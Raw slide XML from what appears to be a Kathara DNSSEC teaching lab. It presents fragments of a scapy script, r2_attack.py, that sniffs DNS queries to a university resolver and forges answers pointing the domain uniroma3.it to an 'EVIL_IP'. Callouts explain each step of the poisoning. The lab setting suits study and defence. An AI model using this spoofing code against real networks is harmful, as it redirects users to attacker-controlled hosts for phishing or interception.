                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615DB5CF-A24F-4F5D-2C29-9312867C63F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3F4977-DD65-1914-9CE9-01609B8077F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9101BFAA-40C6-95B8-95E3-3B7E8B68FD5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5273B125-C1DC-EA5C-C06C-9C3FD6A52523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1189B70-F73A-DB1F-C31D-0CB89E76B7D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="209550" y="2115362"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31106"/>
              <a:gd name="adj2" fmla="val 186854"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>check if the packet contains a DNS query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5397DEDD-EEE1-DFC2-DC2A-E7DEC48DE342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4160887" y="1865579"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37"/>
              <a:gd name="adj2" fmla="val 211112"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>make sure it's a request and not a response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825849F6-24FA-35CE-7331-4CE3FF12049E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8090857" y="1740400"/>
            <a:ext cx="3470176" cy="950585"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35284"/>
              <a:gd name="adj2" fmla="val 153730"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verify that the request is directed to the university's DNS server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BB24DF-549B-E103-5F46-566FFF3E5635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8090857" y="4167016"/>
            <a:ext cx="3956558" cy="1246421"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95711"/>
              <a:gd name="adj2" fmla="val -53119"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extracts the searched domain name (e.g. www.uniroma3.it.) from the binary packet and converts it into a readable string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB84A28-6787-9924-3718-E6EAC17654C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="431593" y="5056749"/>
            <a:ext cx="3956558" cy="1246421"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7169"/>
              <a:gd name="adj2" fmla="val -97898"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the domain searched by the user is the one we want to hit, we proceed with the creation of the "poison"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19154687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095D52-E7D9-7E45-F6A2-F019DB37F86D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837FB979-6BE4-7A2A-14A2-CA5A90E69B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD7AB44D-009B-F1FD-09E1-BF36839DC21D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>):</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == DNS_UNI_IP:        </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
